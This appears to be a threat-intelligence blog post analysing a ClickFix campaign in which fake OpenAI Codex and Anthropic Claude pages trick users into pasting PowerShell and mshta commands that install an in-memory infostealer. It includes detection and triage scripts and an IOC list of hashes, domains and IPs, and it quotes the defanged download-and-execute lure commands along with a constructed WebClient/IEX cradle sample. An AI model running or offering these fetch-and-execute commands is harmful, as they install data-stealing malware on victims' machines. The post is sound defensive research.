by Noufal Radhitya, Threat Intelligence Intern @ PT ITSEC Asia Tbk
In these campaigns, users who want to download artificial intelligence (AI)-related software are presented with instructions containing malicious commands disguised as installation steps.
ClickFix is a social engineering technique that emerged in 2024 and was increasingly used by threat actors throughout 2025. If you’ve read the latest threat intelligence report from ITSEC Asia (June 2026), you’ll know that the ClickFix technique is used to distribute stealer malware by manipulating victims into executing malicious PowerShell commands disguised as legitimate actions, such as fixing a fake error message, solving a CAPTCHA, or completing a verification prompt or script. In this blog post, we dissect the latest evolution of the ClickFix technique used to spread stealer malware. The campaign discussed here exploits the popularity of artificial intelligence (AI)-based software, tricking users into running what they believe are installation commands for AI software; the commands actually download and run malware, including data-stealing programs.
The stealer malware in this research runs in memory inside the legitimate Windows powershell.exe process to minimize forensic evidence. Even so, this research shows that fileless execution does not necessarily eliminate all artifacts. This differs slightly from other external intelligence reports, which do not mention an embedded dropper and suggest limited host-based traces. This research identifies several artifacts that can serve as Indicators of Compromise (IOCs), supporting forensic investigations and campaign correlation efforts.
Malware Infection Chain
The malware campaign uses phishing websites designed to closely imitate the legitimate interfaces of OpenAI Codex and Anthropic Claude. By replicating branding, layouts, and visual elements, the threat actors seek to establish trust and increase the likelihood of user interaction.

Many of these phishing pages are hosted on Google Sites (sites.google.com), leveraging the platform’s reputation and search engine visibility. The attackers also use domain names containing terms such as “promo-codex” to attract users with seemingly legitimate discounts or promotional offers related to popular AI tools.

Analysis of the website source code revealed functionality for detecting a visitor’s operating system. Based on the detected environment, the site dynamically modifies its content, including icons, text, and execution instructions, to match the victim’s platform. The delivered commands and installation instructions are obfuscated, making detection and analysis more difficult while increasing the likelihood of successful malware execution.
After being lured by the convincing appearance of the fake Codex and Claude ClickFix campaign websites, victims are instructed to install malware by following the on-screen instructions. The websites direct users to open a PowerShell terminal, copy and paste a provided command, and execute it by pressing Enter. Because the action is performed manually by the user, the operating system treats it as a legitimate user-initiated activity. As a result, many security controls may not immediately classify the behavior as suspicious, even though the command ultimately leads to the execution of malicious code.

The command provided to the victim is:
“mshta https://primemetricsa[.]com/1518925”
Mshta (mshta.exe) is a built-in Windows program designed to run HTML Applications (HTAs): documents that combine HTML, JavaScript, and VBScript into a standalone application, loaded either from a local file or from an external resource. Once the command is executed, mshta.exe attempts to connect to primemetricsa[.]com, which serves a staged PowerShell delivery.

This ClickFix campaign also distributes alternative commands designed to achieve the same objective through different execution mechanisms. One example is the following PowerShell command: “cls; iex(iwr claudescript[.]top -UseBasicParsing).Content” The command begins with cls, which clears the PowerShell console window. This action is not malicious by itself, but it removes previously displayed output and presents a cleaner interface to the victim. The command then uses iwr (an alias for Invoke-WebRequest) to retrieve content from the domain claudescript[.]top. The -UseBasicParsing parameter instructs PowerShell to process the web request without relying on Internet Explorer components. Finally, the downloaded content is passed directly to iex (Invoke-Expression), which immediately executes the retrieved code in memory.
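The two commands above share a shape that process-creation telemetry can catch: mshta.exe handed a remote resource instead of a local .hta file, and a PowerShell command line in which fetched content (iwr / Invoke-WebRequest, or a Net.WebClient call) is passed straight to iex / Invoke-Expression. The script below is an added example, not code from the original post or from ITSEC Asia: it normalizes command lines (casing, quoting, whitespace) and applies those rules to a handful of constructed process-creation events. The two malicious events reuse the defanged commands quoted in the text; the benign ones, the rule names, and the list of "interactive shell" parent processes are my own assumptions.

```python
from __future__ import annotations

import re
from typing import NamedTuple


class Event(NamedTuple):
    parent: str   # parent process image name
    image: str    # process image name
    cmdline: str  # full command line as logged


class Finding(NamedTuple):
    rule: str
    cmdline: str


# Constructed process-creation events (not from the original post). Events 2 and 3
# reuse the defanged commands quoted in the text; the others are benign stand-ins.
SAMPLE_EVENTS = [
    Event("explorer.exe", "powershell.exe", "powershell.exe"),
    Event("powershell.exe", "mshta.exe", "mshta https://primemetricsa[.]com/1518925"),
    Event("explorer.exe", "powershell.exe",
          'powershell "cls; iex(iwr claudescript[.]top -UseBasicParsing).Content"'),
    Event("explorer.exe", "powershell.exe", "powershell -File C:\\scripts\\backup.ps1"),
    Event("svchost.exe", "mshta.exe", "mshta.exe C:\\Program Files\\Vendor\\setup.hta"),
]

# A URL scheme or a (possibly defanged) host name in mshta's argument
_REMOTE = re.compile(r"https?://|\b[a-z0-9-]+(?:\.|\[\.\])[a-z]{2,}\b")
# Local file references: drive letter, UNC path or relative path
_LOCAL = re.compile(r"^(?:[a-z]:\\|\\\\|\.{1,2}\\)")
# Invoke-Expression and its alias
_IEX = re.compile(r"\b(?:iex|invoke-expression)\b")
# Ways to fetch remote content; curl and wget are Invoke-WebRequest aliases in Windows PowerShell
_FETCH = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget|downloadstring|downloaddata)\b"
    r"|net\.webclient")
# Parents that indicate a human typed or pasted the command (assumed list)
_INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "windowsterminal.exe")


def normalize(cmdline: str) -> str:
    """Lower-case, strip quoting and collapse whitespace so casing and quote
    tricks do not split the tokens the rules look for."""
    text = cmdline.lower().replace('"', "").replace("'", "")
    return re.sub(r"\s+", " ", text).strip()


def classify(ev: Event) -> list[Finding]:
    cl = normalize(ev.cmdline)
    image = ev.image.lower()
    args = cl.split(" ", 1)[1] if " " in cl else ""
    findings: list[Finding] = []

    # Rule 1: mshta pointed at a remote resource instead of a local .hta file
    if image == "mshta.exe" and args and not _LOCAL.match(args) and _REMOTE.search(args):
        findings.append(Finding("mshta_remote_resource", ev.cmdline))

    if image in ("powershell.exe", "pwsh.exe"):
        # Rule 2: download cradle, fetched content handed straight to Invoke-Expression
        if _IEX.search(cl) and _FETCH.search(cl):
            findings.append(Finding("powershell_download_cradle", ev.cmdline))
            # Rule 3: the cradle was launched from an interactive shell, which is
            # the ClickFix hallmark (the user pasted it); a scheduled task or
            # service would show a different parent
            if ev.parent.lower() in _INTERACTIVE_PARENTS:
                findings.append(Finding("cradle_from_interactive_shell", ev.cmdline))

    return findings


def scan(events: list[Event]) -> list[Finding]:
    """Apply every rule to every event and return all findings in order."""
    return [f for ev in events for f in classify(ev)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit.rule:32} {hit.cmdline}")
```

The normalization step matters more than the regexes: ClickFix lures vary casing and quoting freely, and the cls prefix described above is exactly the kind of noise that breaks a naive prefix match. In production this logic would sit on Sysmon Event ID 1 or Windows Security 4688 records rather than the constructed tuples used here.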

However, attempts to execute an alternative script associated with this campaign indicated that the malware delivery infrastructure was either no longer active or had not yet been reactivated by the threat actor. Further investigation was conducted by accessing additional delivery endpoints to assess their operational status. While several endpoints were blocked by Cloudflare and flagged as phishing-related, others remained accessible. This discrepancy suggests that the threat actor leverages path rotation and URL churn techniques as part of their infrastructure strategy to maintain delivery capability and evade security detections.

This research not only focuses on analyzing the distribution methods and infrastructure used in the ClickFix campaign leveraging Codex and Claude lures, but also examines the infection workflow and execution chain employed by the threat actor. When the script provided within the phishing website's instructions was executed, the result was not the download of a legitimate AI application as expected, but rather the execution of malware operating primarily in memory (in-memory execution). The malware integrates its data theft capabilities (infostealer functionality) with legitimate Windows applications and processes, making detection significantly more challenging.

Existing intelligence reports and prior research have suggested that this malware family does not drop any artifacts onto the victim's system. However, findings from this analysis indicate otherwise. The campaign was observed dropping artifacts that may serve as indicators of compromise (IOCs), specifically within the following directory:
“AppData\Local\Microsoft\Windows\INetCache\IE\”
The presence of an artifact named 1518925[1], which closely matches an observed malware delivery endpoint, suggests a potential direct relationship between the host-based artifact and the threat actor's delivery infrastructure. This correlation may provide valuable intelligence for campaign tracking, IOC enrichment, and attribution efforts.
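The correlation described above (a cache entry whose name matches the last segment of a delivery URL) is something a triage script can check on every host, alongside the hash IOCs listed at the end of this post. The following is an added example, not part of the original research or of any ITSEC Asia tooling: it walks an INetCache tree, strips the cache's [n] collision suffix from entry names, compares the stem against known delivery path segments, and hashes files against the published MD5/SHA256 values. The directory layout it builds for the demo mirrors the paths in the IOC table, but the file contents are constructed placeholders (the real files are not reproduced), so only the name-based rule fires on the demo tree.

```python
from __future__ import annotations

import hashlib
import os
import re
import tempfile
from pathlib import Path

# Hash IOCs copied from the table at the end of the post (lower-cased here)
IOC_MD5 = {
    "e3f53c07d6c56d93c166d354b5920572",   # Stage 2 loader
    "f274aef59898ac35093bfc639718b18c",   # image file from the Stage 2 loader
}
IOC_SHA256 = {
    "70b5ecc110e074dbca92932c0e840ea3492ea0a43c3f215b71392c12b02213b2",
    "e119cf806d2f6445a747354ef836996bff64e24e7dbe24a3ecbe84219c13a098",
}
# Last path segment of the delivery URL quoted in the post
# (mshta https://primemetricsa[.]com/1518925)
DELIVERY_PATH_SEGMENTS = {"1518925"}

# Cache entries keep the remote name and gain a [n] suffix on name collisions
_CACHE_NAME = re.compile(r"^(?P<stem>.+?)(?:\[\d+\])?(?:\.[^.]*)?$")


def cache_stem(name: str) -> str:
    """'1518925[1]' -> '1518925', 'logo[2].png' -> 'logo'."""
    m = _CACHE_NAME.match(name)
    return m.group("stem") if m else name


def file_hashes(path: Path) -> tuple[str, str]:
    """Return (md5, sha256) hex digests, streaming so large files are fine."""
    md5, sha = hashlib.md5(), hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            md5.update(chunk)
            sha.update(chunk)
    return md5.hexdigest(), sha.hexdigest()


def triage_cache(root: Path) -> list[dict]:
    """Walk an INetCache tree and report entries (files or directories) whose
    name matches a delivery URL path segment or whose hash matches an IOC."""
    hits: list[dict] = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            entry = Path(dirpath) / name
            if cache_stem(name) in DELIVERY_PATH_SEGMENTS:
                hits.append({"path": str(entry), "reason": "name_matches_delivery_path"})
            if entry.is_file():
                md5, sha = file_hashes(entry)
                if md5 in IOC_MD5 or sha in IOC_SHA256:
                    hits.append({"path": str(entry), "reason": "hash_matches_ioc", "sha256": sha})
    return hits


def build_demo_tree(root: Path) -> Path:
    """Constructed INetCache layout mirroring the IOC table paths, with
    placeholder bytes; the real files' contents are not reproduced."""
    ie = root / "AppData" / "Local" / "Microsoft" / "Windows" / "INetCache" / "IE" / "IJNSHNTN"
    images = ie / "1518925[1]" / "WidgetsPlatformRuntime-ARM64" / "Images"
    images.mkdir(parents=True)
    (images / "placeholder.png").write_bytes(b"\x89PNG\r\n\x1a\n constructed placeholder")
    (ie / "favicon[1].ico").write_bytes(b"benign cached icon")
    return ie


def run_demo() -> list[dict]:
    """Build the constructed tree in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(Path(tmp))
        return triage_cache(Path(tmp))


if __name__ == "__main__":
    for hit in run_demo():
        print(hit)
```

On a live host the root would be the user's %LOCALAPPDATA%\Microsoft\Windows\INetCache directory; the name rule is the one to extend as new delivery endpoints are observed, since the attacker rotates URL paths more cheaply than payload hashes.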

A notable characteristic of this attack is its heavy reliance on in-memory execution techniques. Instead of writing the main payload directly to disk, this malware operates primarily within the system’s RAM. This approach significantly reduces the forensic footprint and helps evade traditional antivirus solutions that rely on file-based detection. During execution, the malicious code can also inject itself into or run alongside legitimate processes, such as powershell.exe, allowing it to blend in with normal system activity and making detection difficult for both users and security products.

After initial execution, a malicious stage-1 loader is delivered and run inside the powershell.exe process. The threat actor deliberately obfuscates parts of the loader’s code with Base64 encoding to conceal its actual functionality and hinder static analysis. Although Base64 encoding is not encryption in the cryptographic sense, malware operators frequently use it to disguise malicious commands and evade simple pattern-based detection mechanisms.

The PowerShell script serves as the initial stage of the attack chain. Upon execution, it collects basic system information that can be used to uniquely identify the infected host and assist the threat actor in tracking compromised systems. The script then prepares the execution environment by modifying certain runtime settings to facilitate communication with attacker-controlled infrastructure while reducing potential interference from security mechanisms.

Further analysis reveals memory manipulation behavior through .NET APIs such as Marshal.WriteInt32, which may indicate attempts to bypass or disable security controls including the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW). Such techniques are commonly observed in modern malware families seeking to evade endpoint monitoring and detection capabilities.

After completing these preparatory steps, the script creates a Net.WebClient object to retrieve an additional payload from the domain creativecommunityinfo[.]art. The downloaded content is then executed directly in memory through Invoke-Expression (IEX) without being written to disk. This fileless execution technique is widely used by contemporary infostealers and other malware families because it minimizes forensic traces, complicates incident response efforts, and allows the final payload to remain concealed until the moment of execution.
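The three stage-1 behaviours described above (Base64-wrapped code, memory patching through Marshal.WriteInt32 aimed at AMSI/ETW, and a Net.WebClient download fed into IEX) are easiest to review once every encoding layer has been peeled back, because the indicators usually sit inside the encoded blobs rather than in the outer script. The script below is an added example, not the campaign's loader and not ITSEC Asia's tooling: it finds base64 runs in captured script-block text, decodes them (UTF-16LE for the -EncodedCommand form, UTF-8 otherwise), recurses into the result, and reports which of the indicators named in this post appear in any layer. The sample script it analyses is constructed programmatically, with a placeholder URL path; the WMI UUID query used as a "host fingerprint" indicator is my assumption about what the basic system-information collection looks like, not something the post confirms.

```python
from __future__ import annotations

import base64
import binascii
import re

# Candidate base64 runs: long enough to be a payload rather than an identifier
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Indicators named in the post (Marshal.WriteInt32, AMSI, ETW, Net.WebClient, IEX,
# Base64) plus an assumed host-fingerprinting pattern (WMI UUID query)
_INDICATORS = {
    "marshal_writeint32": re.compile(r"marshal\]?(?:::|\.)writeint32", re.I),
    "amsi_reference": re.compile(r"\bamsi", re.I),
    "etw_reference": re.compile(r"\betw", re.I),
    "webclient_cradle": re.compile(r"net\.webclient.*?(?:downloadstring|downloaddata)", re.I | re.S),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[a-z0-9+/=]{20,}", re.I),
    "host_fingerprint_wmi_uuid": re.compile(r"win32_computersystemproduct.*?uuid", re.I | re.S),
}


def _decode_candidate(cand: str) -> str | None:
    """Decode a base64 run to text, or return None if it is not text.
    UTF-16LE is used when every other byte is NUL (the -EncodedCommand form)."""
    try:
        raw = base64.b64decode(cand, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        text = raw.decode("utf-16le", errors="replace")
    else:
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def unwrap_layers(script: str, max_depth: int = 5) -> list[str]:
    """Layer 0 is the script as captured; each further layer is the decoded
    text of a base64 run found in the previous layer."""
    layers = [script]
    frontier = [script]
    for _ in range(max_depth):
        nxt = []
        for text in frontier:
            for m in _B64_RUN.finditer(text):
                decoded = _decode_candidate(m.group(0))
                if decoded is not None:
                    nxt.append(decoded)
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return layers


def analyze(script: str) -> dict:
    """Unwrap all encoding layers and list the indicators seen in any of them."""
    layers = unwrap_layers(script)
    hits = sorted(name for name, rx in _INDICATORS.items()
                  if any(rx.search(layer) for layer in layers))
    return {"layers": layers, "indicators": hits}


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


# Constructed three-layer sample (not the campaign's loader): an outer script that
# launches an -EncodedCommand (UTF-16LE base64) whose body decodes a second, UTF-8
# base64 blob holding a Net.WebClient cradle. The URL path is a placeholder.
INNER = ("$w = New-Object Net.WebClient\n"
         "IEX $w.DownloadString('https://creativecommunityinfo[.]art/<PLACEHOLDER_PATH>')")
MIDDLE = ("[Runtime.InteropServices.Marshal]::WriteInt32($p, 0)\n"
          "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + _b64(INNER.encode("utf-8")) + "')))")
SAMPLE_SCRIPT = ("$u = (Get-WmiObject Win32_ComputerSystemProduct).UUID\n"
                 "powershell -NoProfile -EncodedCommand " + _b64(MIDDLE.encode("utf-16le")))


if __name__ == "__main__":
    report = analyze(SAMPLE_SCRIPT)
    print("layers:", len(report["layers"]), "indicators:", report["indicators"])
```

The same unwrapping applied to PowerShell script-block logs (Event ID 4104) gives a reviewer the decoded text the attacker did not want seen; the indicator list is deliberately coarse and is meant to prioritise which captured blocks deserve a closer look, not to stand in for a full analysis.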

After the first-stage loader has successfully executed, it proceeds to retrieve a second-stage loader that is concealed within an image file. This technique is commonly associated with steganography, a method used by threat actors to hide malicious content inside seemingly harmless files. By embedding payload data within an image, attackers can disguise malicious components as legitimate web content, making detection more difficult for security solutions and analysts who rely on conventional file inspection methods.

After the image is successfully downloaded and processed by the first-stage loader, the victim’s device initiates outbound network communications to an external server controlled by the threat actor. Based on the observed infection chain and network activity, this communication likely supports subsequent stages of the malware operation, such as payload delivery, configuration retrieval, or data exfiltration. Through these network interactions, the malware may collect and transmit sensitive information, including browser data, email-related information, and cryptocurrency wallet artifacts. The following illustration shows the attack flow of the campaign that results in a malware infection.

Recommendations
- Strengthen User Awareness: Educate users about ClickFix-style social engineering attacks and the risks of executing commands from untrusted websites.
- Harden PowerShell and Script Execution: Restrict unnecessary PowerShell usage, enable comprehensive logging, and monitor for suspicious script execution activities.
- Enhance Network Security: Block identified malicious domains, URLs, and IP addresses, and monitor outbound connections for potential command-and-control (C2) communications.
- Improve Endpoint Detection and Response: Monitor for PowerShell abuse, MSHTA execution, fileless malware activity, and anomalous process behavior indicative of compromise.
- Strengthen Threat Hunting and Threat Intelligence: Conduct proactive threat hunting, leverage up-to-date threat intelligence, and regularly validate security controls through phishing simulations and security assessments.
Indicators of Compromise
| Type | Indicator | File Path | Comment |
|---|---|---|---|
| MD5 | E3F53C07D6C56D93C166D354B5920572 | C:\Users\{name}\AppData\Local\Microsoft\Windows\INetCache\IE\IJNSHNTN\ | Stage 2 Loader |
| SHA256 | 70B5ECC110E074DBCA92932C0E840EA3492EA0A43C3F215B71392C12B02213B2 | C:\Users\{name}\AppData\Local\Microsoft\Windows\INetCache\IE\IJNSHNTN\ | Stage 2 Loader |
| MD5 | F274AEF59898AC35093BFC639718B18C | C:\Users\{name}\AppData\Local\Microsoft\Windows\INetCache\IE\IJNSHNTN\1518925[1]\WidgetsPlatformRuntime-ARM64\Images\ | Hash File Image From Stage 2 Loader |
| SHA256 | E119CF806D2F6445A747354EF836996BFF64E24E7DBE24A3ECBE84219C13A098 | C:\Users\{name}\AppData\Local\Microsoft\Windows\INetCache\IE\IJNSHNTN\1518925[1]\WidgetsPlatformRuntime-ARM64\Images\ | Hash File Image From Stage 2 Loader |
| Domain | sites[.]google[.]com/view/cdx-biz-ver-24 | N/A | Public Active Domain |
| Domain | sites[.]google[.]com/view/clau-ver-un-24 | N/A | Public Active Domain |
| Domain | sites[.]google[.]com/newpayservices.com/cdx-biz-ver-un-v27 | N/A | Public Active Domain |
| Domain | freshbase11[.]com | N/A | Public Active Domain |
| Domain | wiseview58[.]com | N/A | Public Active Domain |
| Domain | fairpoint29[.]com | N/A | Public Active Domain |
| Domain | fluxforge97[.]com | N/A | Public Active Domain |
| Domain | primemetricsa[.]com | N/A | Delivery Infrastructure |
| Domain | swiftmatrix15[.]com | N/A | Delivery Infrastructure |
| Domain | creativecommunityinfo[.]art | N/A | Delivery Infrastructure |
| Domain | code.codixcody[.]com | N/A | Public Active Domain |
| Domain | mycodingtoolsd[.]com | N/A | Public Active Domain |
| Domain | codex-promo[.]com | N/A | Public Active Domain |
| Domain | cladehub[.]com | N/A | Public Active Domain |
| Domain | cladesktop-apps[.]com | N/A | Public Active Domain |
| Domain | too.clawddddd[.]com | N/A | Public Active Domain |
| Domain | claudescript[.]top | N/A | Delivery Infrastructure |
| IP | 104.21.4.135 | N/A | IP From Domain |
| IP | 172.67.136.90 | N/A | IP From Domain |
| IP | 104.21.83.8 | N/A | IP From Domain |
| IP | 104.21.79.80 | N/A | IP From Domain |
| IP | 104.21.50.45 | N/A | IP From Domain |
| IP | 104.21.6.147 | N/A | IP From Domain |
| IP | 172.67.182.111 | N/A | IP From Network Traffic |
| IP | 172.67.192.100 | N/A | IP From Network Traffic |
